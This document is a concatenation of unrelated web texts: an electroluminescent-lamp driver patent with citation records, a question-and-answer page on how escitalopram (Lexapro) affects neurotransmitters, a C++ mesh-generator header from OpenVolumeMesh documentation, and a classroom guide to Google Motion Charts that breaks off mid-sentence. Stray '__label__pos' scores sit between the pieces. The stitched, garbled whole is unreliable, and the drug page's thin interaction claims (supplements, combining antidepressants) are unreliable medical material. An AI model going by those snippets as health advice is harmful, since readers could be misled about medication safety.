positive and negative driving voltages to the lamp in response to the peak detection signals. Description FIELD OF THE INVENTION The present invention relates to a circuit for driving an electroluminescent (EL) lamp. BACKGROUND OF THE INVENTION EL lamps are used as light sources in miniature applications, such as wrist watches. These lamps have phosphor which glows when an AC voltage is applied. The AC voltage is supplied by an inverter circuit. The inverter circuit supplies a high AC voltage, such as 100 volts peak to peak, at low alternating frequencies of about 60 to 1,000 Hz. Examples of inverter circuits are described in U.S. Pat. No. 5,313,141 issued May 17, 1994 to R. A. Kimball, and U.S. Pat. No. 4,527,096 issued Jul. 2, 1985 to Kindlmann. In EL-lamp miniature applications, the inverter circuit is implemented on an integrated chip (IC), and thus must operate on a very low voltage battery, typically one to three volts. To obtain the necessary high AC voltage levels to operate the EL-lamp, the inverter circuit has an inductor through which current is repeatedly switched on and off at a high frequency, such as 8-100 kHz. The inductor in response produces a high voltage which the circuit applies to the EL-lamp. The inverter circuit generally has switches, typically transistors, which operate at a lower frequency, such as 60-1,000 Hz, to control the electrical connection between the inductor and the EL-lamp in concert with the alternating high voltage polarity. The inverter circuit described above requires two clock signals, one operating at a high frequency to switch the inductor and the other at a low frequency to control voltage polarity. To generate the clock signals, typical wristwatch inverter circuits use an external clock input signal from a timekeeping chip, usually at 32 kHz, which is amplified and then divided down to two usable frequencies. The 32 kHz clock signal is divided down by a series of divider circuit stages. Each divider stage can divide the frequency by two, and generally requires six logic gates. For example, to generate 8 kHz and 250 Hz signals, the 32 kHz signal may be applied to two divider stages to obtain an 8 kHz signal, and then to four more divider stages to obtain a 250 Hz signal. Thus, six divider stages are needed, which requires a total of 36 gates. The number of gates can be reduced by having the timekeeping chip operate at 8 kHz and applying it to only four divider stages. Nevertheless, the added gates needed to implement the divider circuits increase the size and complexity of the IC, thereby increasing IC chip fabrication costs. In addition, an amplifier is needed to amplify the 32 kHz signal prior to dividing down, which can cause a power drain on the battery. To accommodate this power drain, a higher capacity battery may be required, which also increases the cost and size of the circuit. Alternatively, two separate internal oscillators, a low frequency oscillator and a high frequency oscillator, can be used to provide the two clock signal frequencies needed to operate the inverter circuit. These oscillators typically require capacitors external to the IC to control the frequency. The need for a low frequency oscillator, in addition to a high frequency oscillator, still increases the number of devices needed to implement the inverter circuit, thereby also increasing the cost and size of the IC. Moreover, the required external capacitors also increase the cost of the overall implementation of the inverter circuit. Accordingly, it is desirable to have an inverter circuit which requires neither a separate low frequency clock signal in addition to a high frequency clock signal, nor external capacitors. Further, typical inverter circuits control the low frequency clock signal to maintain constant the frequency of the AC output voltage applied to the EL-lamp. As the battery is discharged with use, the frequency of the output voltage remains essentially constant while the peak to peak output voltage decreases as the battery nears the end of its life. Further, as the battery nears the end of its life, this decreasing peak to peak output voltage results in a reduction in the brightness of the EL-lamp. However, maintaining the frequency of the AC output voltage increases the complexity and fabrication cost of the IC, because of the additional circuitry needed to produce the separate low frequency clock signal, as described above. SUMMARY OF THE INVENTION Accordingly, an object of the present invention is to provide an improved circuit for driving an EL-lamp which eliminates the need to input a low frequency signal to an inverter circuit. Another object of the present invention is to provide an improved circuit for driving an EL-lamp which maintains a relatively constant AC voltage, peak to peak, to the EL-lamp as the battery in the EL-lamp application runs down. It is still another object of the present invention to provide an improved circuit for driving an EL-lamp which provides the EL-lamp with excellent brightness characteristic while reducing the number of devices needed to implement the circuit as compared with prior art circuits for driving an EL-lamp, thereby simplifying implementation and reducing the cost of IC manufacturing. Briefly described, the present invention provides a circuit for repeatedly switching current through an inductor for driving an electroluminescent lamp at alternating voltage levels having both peak positive and peak negative polarities. This circuit includes a circuit path having two zener diodes in series connection with the lamp. These zener diodes each have anode and cathode terminals, and a breakdown voltage. These zener diodes also have a pair of identical terminals connected together. These zener diodes cause conduction along the circuit path in a first direction when a positive voltage driving the lamp exceeds the breakdown voltage of a first of the two zener diodes to provide a peak detection signal representing that the lamp has reached the peak positive polarity voltage level. Further, these zener diodes cause conduction along the circuit path in a direction opposite the first direction when a negative voltage driving the lamp exceeds the breakdown voltage of a second of the two zener diodes to provide a peak detection signal representing that the lamp has reached the peak negative polarity voltage level. The circuit also has a polarity control circuit coupled to the circuit path. This control circuit switches the polarity of the voltage driving the lamp to a negative polarity in response to the positive peak detection signal and switches the polarity of the voltage to the lamp to a positive polarity in response to the negative peak detection signal. BRIEF DESCRIPTION OF THE DRAWING The present invention will be better understood and appreciated more fully from the following detailed description, taken in conjunction with the accompanying drawing, in which: FIG. 1 is a schematic diagram of a circuit embodying the present invention. FIG. 2 is a schematic diagram illustrating an example of the flip-flop circuit in FIG. 1. DETAILED DESCRIPTION OF THE INVENTION Referring to FIG. 1, there is shown a circuit 10 of the present invention. Circuit 10 has a switching circuit 20 which is interconnected with a polarity control circuit 30. Switching circuit 20 switches current through an inductor L for driving an electroluminescent lamp 11 with an alternating voltage. A circuit path 32 couples circuits 20 to 30 and feedback signals to the polarity control circuit 30. Polarity control circuit 30 in response to these signals alternates the polarity of the AC voltage to lamp 11 driven by switching circuit 20. Circuit 10 and its operation are described in more detail below. The switching circuit includes a PNP transistor 12 and a NPN transistor 13, which are connected in series with inductor L across the supply terminal (VBAT) of a battery (not shown in FIG. 1 ) and the ground terminal (gnd). The base of transistors 12 and 13 provide input lines which receive signals from polarity control circuit 30, which will be described later. Also included in switching circuit 20 are switches 16 and 18 for controlling the direction of charging and discharging current to lamp 11. Lamp 11 is represented as a capacitive load in FIG. 1. Switch 16 is coupled via diode 5 between one side of the inductor and lamp 11, while switch 18 is coupled with diode 6 between the second terminal of inductor L and lamp 11. Diode 5 and diode 6 protect switch 16 and switch 18, respectively, from the high voltage transients produced by inductor L. Switches 16 and 18 are auto-triggering SCRs 2 and 4, respectively. SCR 2 switches on in response to a negative going voltage transition pulse at the positive end of inductor L which is caused by turning off transistor 12. SCR 4 switches on in response to a positive going voltage transition pulse at the negative end of inductor L which is caused by turning off transistor 13. In addition to SCR 2, switch 16 has additional components of resistors 9 and 15, and diode 8. Also, switch 18 has additional components of resistors 10 and 14 and diode 7. The operation and components of switches 16 and 18, including SCRs 2 and 4, are described in application Ser. No. 08,490,016, filed Jun. 13, 1995 by the same inventor as this application, which is herein incorporated by reference. The operation of switching circuit 20 is generally the same as the inverter circuit shown in FIG. 6 of the Kimball Patent, except switching circuit 20 uses auto-triggering SCRs 2 and 4 which do not require the application of a low frequency signal to control their operation. Polarity control circuit 30 has a set-reset flip-flop circuit 26 having set (S) and reset (R) inputs, and outputs O and Q to provide output signals Q1 and Q2, respectively. Output signal Q2 is the opposite of output signal Q1. Polarity control circuit 30 also has a triggering circuit 27 coupled to lamp 11, via circuit path 32, and connected to the set and reset inputs of flip-flop 26. Triggering circuit 27 includes two NPN transistors 34 and 35 which provide level shifting of feedback peak detection signals, via circuit path 32, appropriate to trigger the flip-flop 26 at its set and reset inputs. Circuit 27 and the peak detection signals are described in more detail later in the discussion of circuit 10 operation. Circuit 10 also includes a digital oscillator 22 which is powered by VBAT from the battery and enabled by an ENABLE signal. Oscillator 22 provides an output signal Vout to polarity control circuit 30, as described below. Vout is a non-symmetrical output signal with a longer on time than off time. The frequency of oscillator 22 is set at 6 to 20 kHz, depending on the IC fabrication process used and the end application of lamp 11 with circuit 10. Oscillator 22 may be considered part of polarity control circuit 30, as shown in FIG. 1, or as in input to the polarity control circuit 30. Interconnected with oscillator 22 and flip-flop 26 are AND gate 23 and NAND gate 24. Each gate 23, 24 has two inputs and one output representing the logical operation performed by the gate on its inputs. The output of AND gate 23 is connected to the base of transistor 12, while the output of the NAND gate 24 is connected to the base of transistor 13. AND gate 23 receives the output signal from Q1 at one of its inputs and Vout at its other input. NAND gate 24 receives the output signal from Q2 at one of its inputs and Vout at its other input. Circuit path 32 couples triggering circuit 27 of polarity circuit 30 to lamp 11. Circuit path 32 has two zener diodes 28 and 29, which are connected in series between lamp 11 and input circuit 27 with their anodes connected together. The cathode of zener diode 29 connects to lamp 11 while the cathode of zener diode 28 connects to input circuit 27. Alternatively, zener diodes 28 and 29 may have their cathodes connected together and their respective anodes connected to input circuit 27 and lamp 11. Each zener diode 28 and 29 has a breakdown voltage. Preferably, the breakdown voltage of the two zeners 28 and 29 are the same in order to minimize the DC component of the voltage applied to load 11. In circuit 10 implementation, the zener voltages available in any given IC fabrication process may be limited. Therefore, each zener diode may be formed by a series of more than one zener diodes. The final breakdown voltage is then the sum of the zener diode voltages in series plus the forward diode voltages of the zener diode(s) connected in the opposite polarity. Flip-flop 26 in circuit 10 may be simpler than standard flip-flop circuits, and the particular implementation of the flip-flop depends on the fabrication process chosen for the implementation of the IC EL driver chip. An example of an implementation of flip-flop 26 will be described later in connection with FIG. 2. The signal pulses for operating circuit 10 of FIG. 1 may be described by FIG. 7 of the Kimball Patent whereby: Signal B represents Vout from oscillator 22, except Vout is not symmetrical, as described above. Signal A represents Q1 and A represents Q2. The output signal from AND 23 to transistor 12 is represented by X and the output signal form NAND 24 to transistor 13 is represented by Y. The operation of the circuit 10 is as follows: Assuming an initial state for flip-flop 26 with Q1=0 (low) and Q2=1 (high), the output of AND gate 23 is always 0 (low), which turns on transistor 12 to connect VBAT to inductor L, and the output of NAND gate 24 follows Vout, thereby switching transistor 13 on and off with each Vout cycle. This operates switching circuit 10 to store positive voltage levels on lamp 11. Note that since Vout is a non-symmetrical signal, the on time for transistor 13 is longer than its off time for each cycle of Vout. Each time Vout completes one cycle, inductor L produces a voltage which charges lamp 11 through switch 18 and the voltage on lamp 11 has a positive step increase. The positive voltage level increases in these steps on lamp 11, but each step is about half the previous step. Thus, the capacitance of lamp 11 stores this voltage as a positive stair-case. When the voltage level on lamp 11 has exceeded the breakdown or zener voltage of zener diode 28, the desired peak positive voltage level of lamp 11, a positive peak detection signal or pulse is carried through zener diodes 28 and 29 of path 32 to triggering circuit 27. In triggering circuit 27, the positive peak detection signal provides a current flow into the base of NPN transistor 34 causing it to turn on and pull the reset input of flip-flop 26, which is connected to the collector of transistor 34, to a low state, thereby reseting the flip-flop. This reseting of flip-flop 26 changes Q1 to 1 (high) and Q2 to 0 (low). Now, the output of NAND gate 24 is always 1 (high), which turns on transistor 13 to connect inductor L to gnd, and the output of AND gate 23 follows Vout, thereby switching transistor 12 on and off with each Vout cycle. This reverse the polarity of the voltage applied by switching circuit 20 to lamp 10 to negative. Note that since Vout is a non-symmetrical signal, the on time for transistor 12 is longer than its off time for each cycle of Vout. For each cycle of Vout, inductor L produces a voltage which discharges lamp 11 through switch 16 and the voltage on lamp 11 has a step negative voltage increase. Thus, with successive cycle of Vout, the negative voltage level increases in steps on lamp 11, but the size of each step is about half of the previous step. The capacitance of lamp 11 stores the voltage as a negative stair-case. When the voltage level on lamp 11 has exceeded the breakdown or zener voltage of zener diode 29, the desired peak negative voltage level on lamp 11, a negative peak detection signal or pulse is carried through the zener diodes 28 and 29 of path 32 from triggering circuit 27. In triggering circuit 27, the negative peak detection signal pulls the emitter of the NPN transistor 35 below ground causing base current to flow into its base which is connected to ground. This causes the collector of NPN transistor 35, which is connected to the set input of flip-flop 26, to go to a low state, thereby causing flip-flop 26 to return to its set state. This return to set state in flip-flop 26 changes Q1 to 0 (low) and Q2 to 1 (high). Switching circuit 20 then begins driving lamp 11 to a positive voltage level, as already described, and the above repeats until the ENABLE signal to oscillator 22 is removed. Circuit 10 maintains a relatively constant positive peak to negative peak AC voltage level, such as 138 volts, across EL-lamp 11, and allows the frequency to vary as the battery powering circuit 10 and high frequency oscillator 22 runs down. This achieves the same result as the prior art circuit for driving an EL-lamp which maintain a relatively constant frequency, because the brilliance of the EL-lamp is relatively linear with both voltage and the frequency applied to the lamp. Thus, when either voltage or frequency is maintained relatively constant as the battery runs down, the decrease rate of the brilliance of the EL-lamp will be the same. However, maintaining a relatively constant AC voltage does not require the additional prior art components needed to generate a low frequency signal, thereby reducing the cost, complexity and size of IC chip implementation. For example, the IC chip size reduction may be from 4,600 mills, using the dual oscillator prior art approach, to about 2,400 mills, which is about a 50% reduction. The actual area savings in IC chip size will vary depending on the IC fabrication process used to implement circuit 10. This is because the present invention, rather than requiring a second low frequency signal, uses the voltage level on lamp 11 to switch polarity of the current being switched repeatedly though inductor L. In circuit 10, flip-flop 26 may be simpler than standard flip-flop circuits, as stated earlier. Referring to FIG. 2, an example circuit of a simpler implementation of flip-flop 26 is shown. This implementation is appropriate if the chosen IC process is a bipolar process and the logic that follows the flip-flop is of a "Schottky Transistor Logic" (STL) type. The flip-flop has two cross-coupled NPN transistors 37 and 38, such that a collector (Schottky contact) A of each transistor is connected to the base of the other transistor. Both collector (Schottky contacts) A and B of each transistor are connected to constant current sources, and the emitters of the transistors are tied to ground. The set and reset inputs are connected to the base of transistors 37 and 38, respectively. The two complimentary outputs, O and Q, are connected to collector B of transistors 37 and 38, respectively. The flip-flop of FIG. 2 operates in circuit 10 as follows. In the first case the load (11 in circuit 20) is driven positive until the zener voltage of zener diode 28 is reached. This causes base current to flow into the base of NPN transistor 34 in circuit 27 which causes the reset input of the flip-flop to be pulled low. When the reset input of the flip-flop is pulled low, transistor 38 is turned off. Once transistor 38 is turned off both collector contacts rise as a result of the constant current sources. When collector A reaches a voltage level of 1 Vbe, transistor 37 turns on. With transistor 37 on, the base of transistor 38 is held low by the connection to transistor 37 collector A. This cross-connection of collector A of each transistor provides the two stable states of the flip-flop. The setting of the flip-flop is accomplished in a like manner by pulling the set input low which causes the flip-flop to enter the opposite state. Thus the logic level output voltages are 1 Vbe or about 0.6 volts for a high level and a Vsat+V(schottky) or about 0.3 volts for a low. The constant current sources can be formed by PNP current mirrors in a bipolar process or by high value resistors. In a CMOS process the flip-flop can be formed by cross-coupled inverters. The implementation of the present invention shown in FIG. 1 is shown using bipolar transistor devices, however a MOS implementation, such as shown in FIG. 2 of the Kindlmann Patent, may also be used to remove their dependency on a low frequency clock signal. From the foregoing description, it will be apparent than there has been provided improved circuit for driving an EL-lamp. Variations and modifications in the herein described circuit, in accordance with the invention, will undoubtedly suggest themselves to those skilled in the art. Accordingly, the foregoing description should be taken as illustration and not in a limiting sense. Patent Citations Cited PatentFiling datePublication dateApplicantTitle US4527096 *Feb 8, 1984Jul 2, 1985Timex CorporationDrive circuit for capacitive electroluminescent panels US5172032 *Mar 16, 1992Dec 15, 1992Alessio David SMethod of and apparatus for the energization of electroluminescent lamps US5313141 *Apr 22, 1993May 17, 1994Durel CorporationThree terminal inverter for electroluminescent lamps Referenced by Citing PatentFiling datePublication dateApplicantTitle US6043609 *May 6, 1998Mar 28, 2000E-Lite Technologies, Inc.Control circuit and method for illuminating an electroluminescent panel US6072477 *Mar 27, 1997Jun 6, 2000Matsushita Electric Industrial Co., Ltd.El display and driving circuit for the same US6304039Aug 8, 2000Oct 16, 2001E-Lite Technologies, Inc.Power supply for illuminating an electro-luminescent panel US6376934Aug 18, 1999Apr 23, 2002Sipex CorporationVoltage waveform generator US6734836 *Oct 12, 2001May 11, 2004Nec CorporationCurrent driving circuit US7545225Aug 10, 2006Jun 9, 2009Multigig Inc.Regeneration device for rotary traveling wave oscillator US8633774Dec 5, 2011Jan 21, 2014Analog Devices, Inc.Electronic pulse generator and oscillator US8669818Apr 30, 2012Mar 11, 2014Analog Devices, Inc.Wave reversing system and method for a rotary traveling wave oscillator CN100502219COct 29, 2004Jun 17, 2009英特赛尔美国股份有限公司Multiplexed high voltage DC-AC driver, transformer and voltage conversion method EP1922812A2 *Aug 11, 2006May 21, 2008Multigig LimitedRegeneration device for rotary traveling wave oscillator WO1999057618A1 *May 3, 1999Nov 11, 1999Lite Technologies Inc EControl circuit and method for illuminating an electroluminescent panel WO2007021983A2 *Aug 11, 2006Feb 22, 2007Multigig LtdRegeneration device for rotary traveling wave oscillator Classifications U.S. Classification315/169.3, 315/226, 315/209.00R, 315/224 International ClassificationH05B33/08 Cooperative ClassificationY02B20/325, H05B33/08 European ClassificationH05B33/08 Legal Events DateCodeEventDescription Mar 7, 1996ASAssignment Owner name: HARRIS CORPORATION, FLORIDA Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:WOOD, GRADY MCCONNELL;REEL/FRAME:007901/0994 Effective date: 19960304 Sep 27, 1999ASAssignment Owner name: INTERSIL CORPORATION, FLORIDA Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:HARRIS CORPORATION;REEL/FRAME:010247/0043 Effective date: 19990813 Nov 8, 1999ASAssignment Apr 13, 2001FPAYFee payment Year of fee payment: 4 Apr 14, 2005FPAYFee payment Year of fee payment: 8 Apr 14, 2009FPAYFee payment Year of fee payment: 12 May 5, 2010ASAssignment Owner name: MORGAN STANLEY & CO. INCORPORATED,NEW YORK Free format text: SECURITY AGREEMENT;ASSIGNORS:INTERSIL CORPORATION;TECHWELL, INC.;INTERSIL COMMUNICATIONS, INC.;AND OTHERS;REEL/FRAME:024329/0831 Effective date: 20100427 May 26, 2010ASAssignment Owner name: INTERSIL CORPORATION,FLORIDA Free format text: RELEASE BY SECURED PARTY;ASSIGNOR:CREDIT SUISSE FIRST BOSTON;REEL/FRAME:024445/0049 Effective date: 20030306 Jul 1, 2014ASAssignment Owner name: INTERSIL AMERICAS INC., CALIFORNIA Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNOR:INTERSIL COMMUNICATIONS, INC.;REEL/FRAME:033262/0582 Effective date: 20011221 Owner name: INTERSIL COMMUNICATIONS, INC., CALIFORNIA Free format text: CHANGE OF NAME;ASSIGNOR:INTERSIL CORPORATION;REEL/FRAME:033261/0088 Effective date: 20010523 Owner name: INTERSIL AMERICAS LLC, CALIFORNIA Free format text: CHANGE OF NAME;ASSIGNOR:INTERSIL AMERICAS INC.;REEL/FRAME:033262/0819 Effective date: 20111223
__label__pos
0.624142
What neurotransmitter does Lexapro work on? Escitalopram inhibits the reuptake of the neurotransmitter serotonin (5-HT) at the serotonin reuptake pump of the neuronal membrane of the presynaptic cell, thereby increasing levels of 5-HT within the synaptic cleft and enhancing the actions of serotonin on 5HT1A autoreceptors. Which neurotransmitters does Lexapro affect? Lexapro (escitalopram) is an antidepressant which works by increasing neurotransmitter activity in the brain. It is a selective serotonin reuptake inhibitor or SSRI-type medication which only affects one type of neurotransmitter, serotonin. Does Lexapro work on GABA? Escitalopram was shown to have an antioxidant effect associated with an increase in GABA levels in frontal cortices and nucleus accumbens homogenates from rats exposed to chronic mild stress (Shalaby and Kamal, 2009). What does lexapro do to the brain? It works by helping to restore the balance of a certain natural substance (serotonin) in the brain. Escitalopram belongs to a class of drugs known as selective serotonin reuptake inhibitors (SSRI). It may improve your energy level and feelings of well-being and decrease nervousness. Does Lexapro help neurotransmitters? Orange colors indicate higher centrality. Three ours after the administration of escitalopram the architecture of functional networks changes considerably. Comparison of network centrality between placebo (left) and 20 Milligramm escitalopram (right). Orange colors indicate higher centrality. IMPORTANT:  How long does 3 mg of melatonin stay in your system? Can you take Lexapro and Wellbutrin together? Clinical studies have shown that taking Wellbutrin and Lexapro together can produce beneficial results. Combining Wellbutrin and Lexapro together can improve symptoms in depressed patients. Talk to your doctor or a Minded expert to find out if the combination might work for you. What is dopamine vs serotonin? Dopamine and serotonin regulate similar bodily functions but produce different effects. Dopamine regulates mood and muscle movement and plays a vital role in the brain’s pleasure and reward systems. Serotonin helps regulate mood, sleep, and digestion. Can you take ashwagandha and Lexapro? No interactions were found between ashwaganda and Lexapro. This does not necessarily mean no interactions exist. Always consult your healthcare provider. Do SSRIs lower glutamate? “While the serotonergic component is immediately amplified following SSRI administration, the glutamate component is acutely suppressed and is only normalized after several days of drug treatment,” says Fischer. Can I take magnesium with Lexapro? No interactions were found between Lexapro and magnesium oxide. This does not necessarily mean no interactions exist. Always consult your healthcare provider. Does Lexapro affect dopamine? Escitalopram (at a dose that affects memory consolidation) increased hippocampal serotonin levels fourfold without changing dopamine or noradrenaline. Is serotonin a neurotransmitter? Serotonin is perhaps best known as a neurotransmitter that modulates neural activity and a wide range of neuropsychological processes, and drugs that target serotonin receptors are used widely in psychiatry and neurology. Does reuptake increase neurotransmitters? The main objective of a reuptake inhibitor is to substantially decrease the rate by which neurotransmitters are reabsorbed into the presynaptic neuron, increasing the concentration of neurotransmitter in the synapse. This increases neurotransmitter binding to pre- and postsynaptic neurotransmitter receptors. IMPORTANT:  Quick Answer: Do antidepressants make you confident? Do any antidepressants increase GABA? Repeated treatment of depressed sub- jects with either electroconvulsive therapy (2) or selective serotonin reuptake inhibitors (SSRIs) (3) increases total occipital GABA levels, suggesting that antidepressant treatments may have a common ability to increase GABA neurotransmission. Do SSRIs increase GABA? Conclusions: These findings extend previous work showing that SSRI treatment increases cortical GABA in depressed patients and suggest that this results from an action of SSRIs on GABA neurons rather than as a secondary consequence of mood improvement. What antidepressants work on GABA? Tricyclic antidepressants (TCAs) such as amitriptyline, imipramine, desipramine, nortriptyline, clomipramine, trimipramine, protriptyline and doxepin.
__label__pos
0.999997
Developer Documentation MeshGenerator.hpp 1 /* 2  * MeshGenerator.hh 3  * 4  * Created on: Mar 15, 2012 5  * Author: kremer 6  */ 7  8 #ifndef MESHGENERATOR_HH_ 9 #define MESHGENERATOR_HH_ 10  11 #include <vector> 12 #include <set> 13 #include <map> 14 #include <algorithm> 15  16 #include <boost/shared_ptr.hpp> 17 #include <boost/progress.hpp> 18 #include <boost/tuple/tuple.hpp> 19 #include <boost/tuple/tuple_comparison.hpp> 20  21 #include <OpenVolumeMesh/Mesh/PolyhedralMesh.hh> 22 #include <OpenVolumeMesh/Geometry/VectorT.hh> 23  25 private: 26  33  34  typedef boost::tuple<VertexHandle, VertexHandle, VertexHandle> FaceTuple; 35  36 public: 37  39  41  42  MeshGenerator(PolyhedralMesh& _mesh) : v_component_(0), mesh_(_mesh), progress_() {} 43  MeshGenerator(const MeshGenerator& _cpy) : 44  v_component_(_cpy.v_component_), 45  vertex_(0.0, 0.0, 0.0), 46  c_vertices_(), 47  faceMap_(), 48  mesh_(_cpy.mesh_), 49  progress_() {} 50  51  void add_vertex_component(double _comp) { 52  53  if(v_component_ > 2) { 54  std::cerr << "Vertices of dimension higher than three not supported!" << std::endl; 55  return; 56  } 57  vertex_[v_component_] = _comp; 58  ++v_component_; 59  if(v_component_ == 3) { 60  add_vertex(); 61  } 62  } 63  64  void add_vertex() { 65  66  OpenVolumeMesh::VertexHandle vh = mesh_.add_vertex(vertex_); 67  //std::cerr << "Added vertex " << mesh_.vertex(vh) << std::endl; 68  v_component_ = 0; 69  } 70  71  void add_cell_vertex(unsigned int _idx) { 72  73  assert(_idx > 0); 74  75  c_vertices_.push_back(OpenVolumeMesh::VertexHandle((int)_idx - 1)); 76  if(c_vertices_.size() == 4) { 77  78  add_tetrahedral_cell(); 79 // std::cerr << "Adding cell (" << c_vertices_[0] << ", " << c_vertices_[1] << 80 // ", " << c_vertices_[2] << ", " << c_vertices_[3] << ")" << std::endl; 81  c_vertices_.clear(); 82  } 83  } 84  85  void set_num_cells(unsigned int _n) { 86  87  if(progress_.get() == NULL) { 88  progress_.reset(new boost::progress_display(_n)); 89  } 90  } 91  92  void add_tetrahedral_cell() { 93  94  if(c_vertices_.size() != 4) { 95  std::cerr << "The specified cell is not incident to four vertices!" << std::endl; 96  return; 97  } 98  99  // Get cell's mid-point 100  Vec3d midP(0.0, 0.0, 0.0); 101  double valence = 0.0; 102  for(std::vector<OpenVolumeMesh::VertexHandle>::const_iterator it = c_vertices_.begin(); 103  it != c_vertices_.end(); ++it) { 104  midP += mesh_.vertex(*it); 105  valence += 1.0; 106  } 107  midP /= valence; 108  109  // Sort vertex vector 110  std::sort(c_vertices_.begin(), c_vertices_.end()); 111  112  std::vector<FaceTuple> tuples; 113  114  // Create face tuple for all vertex combinations 115  tuples.push_back(FaceTuple(c_vertices_[0], c_vertices_[1], c_vertices_[2])); 116  tuples.push_back(FaceTuple(c_vertices_[1], c_vertices_[2], c_vertices_[3])); 117  tuples.push_back(FaceTuple(c_vertices_[0], c_vertices_[2], c_vertices_[3])); 118  tuples.push_back(FaceTuple(c_vertices_[0], c_vertices_[1], c_vertices_[3])); 119  120  // Collect cell's half-faces in here 121  std::vector<HalfFaceHandle> cell_halffaces; 122  123  for(std::vector<FaceTuple>::const_iterator it = tuples.begin(); 124  it != tuples.end(); ++it) { 125  126  // Check if face exists for current tuple 127  FaceMap::iterator f = faceMap_.find(*it); 128  if(f == faceMap_.end()) { 129  // Face does not exist, create it 130  131  // Find right orientation, s.t. normal 132  // points inside the cell 133  134  Vec3d e1 = mesh_.vertex(it->get<1>()) - mesh_.vertex(it->get<0>()); 135  Vec3d e2 = mesh_.vertex(it->get<2>()) - mesh_.vertex(it->get<1>()); 136  137  // Get face normal (cross product) 138  Vec3d n = (e1 % e2).normalize(); 139  140  std::vector<VertexHandle> v_vec; 141  v_vec.push_back(it->get<0>()); 142  v_vec.push_back(it->get<1>()); 143  v_vec.push_back(it->get<2>()); 144  FaceHandle fh = mesh_.add_face(v_vec); 145  146  // Add face to face map 147  faceMap_[*it] = fh; 148  149  // Check whether normal points inside cell 150  if(((midP - mesh_.vertex(it->get<0>())) | n) > 0.0) { 151  152  // Normal points inside cell, just add half-face 0 153  // Add corresponding half-face to cell definition 154  cell_halffaces.push_back(mesh_.halfface_handle(fh, 0)); 155  156  } else { 157  158  // Normal points outside cell, just add half-face 1 159  // Add corresponding half-face to cell definition 160  cell_halffaces.push_back(mesh_.halfface_handle(fh, 1)); 161  } 162  163  } else { 164  165  // Face exists, find right orientation 166  FaceHandle fh = f->second; 167  168  std::vector<HalfEdgeHandle> hes = mesh_.face(fh).halfedges(); 169  170  assert(hes.size() == 3); 171  172  Vec3d e1 = mesh_.vertex(mesh_.halfedge(hes[0]).to_vertex()) - 173  mesh_.vertex(mesh_.halfedge(hes[0]).from_vertex()); 174  Vec3d e2 = mesh_.vertex(mesh_.halfedge(hes[1]).to_vertex()) - 175  mesh_.vertex(mesh_.halfedge(hes[1]).from_vertex()); 176  177  Vec3d n = (e1 % e2).normalize(); 178  179  if(((midP - mesh_.vertex(mesh_.halfedge(hes[0]).from_vertex())) | n) > 0.0) { 180  // Normal points inside cell 181  cell_halffaces.push_back(mesh_.halfface_handle(fh, 0)); 182  } else { 183  // Normal points outisde cell 184  cell_halffaces.push_back(mesh_.halfface_handle(fh, 1)); 185  } 186  } 187  } 188  189  // Check whether cell definition contains four half-faces 190  assert(cell_halffaces.size() == 4); 191  192  // Finally, add cell 193 #ifndef NDEBUG 194  mesh_.add_cell(cell_halffaces, true); 195 #else 196  mesh_.add_cell(cell_halffaces, false); 197 #endif 198  199  // Increase progress counter 200  if((progress_.get() != NULL) && (progress_->expected_count() != 0)) 201  ++(*progress_); 202  } 203  204 private: 205  206  typedef std::map<FaceTuple, OpenVolumeMesh::FaceHandle> FaceMap; 207  208  unsigned int v_component_; 210  211  std::vector<VertexHandle> c_vertices_; 212  213  FaceMap faceMap_; 214  215  PolyhedralMesh& mesh_; 216  217  boost::shared_ptr<boost::progress_display> progress_; 218 }; 219  220 #endif /* MESHGENERATOR_HH_ */ const VecT & vertex(const VertexHandle &_vh) const Get point _vh&#39;s coordinates. virtual VertexHandle add_vertex() Override of empty add_vertex function.
__label__pos
0.981552
FLIPSTER STEAMpunks WIKI Join The Parade, New South Wales - Ph:+61-2-1234-5678 How To Make Your Own Google Motion Chart: Australian Curriculum: The NSW Sylabusses for the Australian curriculum requires that students learn how to describe and represents mathematical situations in a variety of ways using mathematical terminology and conventions MA3-1WM,MA3-3WM,MA3-18SP Resources : There are two primary sources of teacher information for this project, plus three student resources: Teacher resources: 1. A Colour By Numbers activity plan for teachers. 2. A Google Charts Howto for teachers. Student resources: 1. How to make your own Google Motion Charts for students (and teachers). 2. An on-line quiz/pretest and Motion Chart howto for students (and teachers). Project: This project is intended to provide a fun opportunity for students to learn something new about maths and genetics through the use of modern charting and data visualisation tools. The information below will help introduce students to Google Motion Charts (a homework task), and to help students learn how to collect/manage data and create their own charts. This project provides students with an opportunity to look at data and mathematics in a new way. Introduction To Motion Charts: Charts are visual displays that are designed to make it easier for people to understand quantities and the relationships between things. Google Apps includes a large collection of modern mathematical processing and charting tools. The 'Motion Chart' is one of these apps. A Motion Chart is a dynamic chart that displays and compares up to five data sets and tracks them over the course of time: Video 1. Example Data Visualisation Using Motion Charts (what is possible): Google Apps includes a large collection of charting options. Many of the Google charting options are easy enough for primary students use and this project provides a fun opportunity for students to put their charting skills to the test. How To create a Motion Chart Spreadsheet and/or Form: The first column should contain entities (e.g. countries), the second is time (e.g. years), followed by 2-4 numeric or string columns See Google Motion Chart howto: 1. Decide what you want to show as bubbles (e.g. Eye colours) put those in column 'A' 2. The second column MUST include DATE values, either in year, month/day/year, week number or quarter format. If linking a form to a sheet, the 'Timestamp' data should be located [https://support.google.com/docs/answer/1047434?hl=en|in second column]] (column B). 3. There can be a minimum of two and maximum of four additional columns (maximum total six columns including Timestamp/Date column). These columns can contain either numeric or text data. Text data, for example, could be an indicator of the weather for a given day – “cloudy”, “raining”, or “clear”. Columns that display numeric data will be available for selection in the chart options box for the 'X', 'Y', 'Color' and 'Size' axes of the motion chart. Columns containing text will only appear in the drop-down menu for 'Color'. NOTE : When a spreadsheet is created by Google forms, Google forms adds a default Timestamp column. If you create a spreadsheet manually, then add the Timestamp column manually (if it is missing) In case of problems, the column layout and Timestamp columns are the most likely culprits. Here is an example of column entries for a working spreadsheet: Fig 1. Example spreadsheet entries for a working demo Motion Chart Create The Example Interactive Motion Chart: To get up and running with live testing: 1. Add a few test entries to the spreadsheet (three or four rows is enough 2. From the sheet menu, click on: Insert → Chart 3. Click on the Insert button in bottom left-hand corner of the motion chart screen 4. When done, select to option to save the chart in it's own sheet (see docs) 5. See section (below) titled 'Motion Chart Setup Details' for more detail. Fig 3. Example Eye Colour spreadsheet for Motion Chart Fig 3. Move new Motion Chart to own sheet A 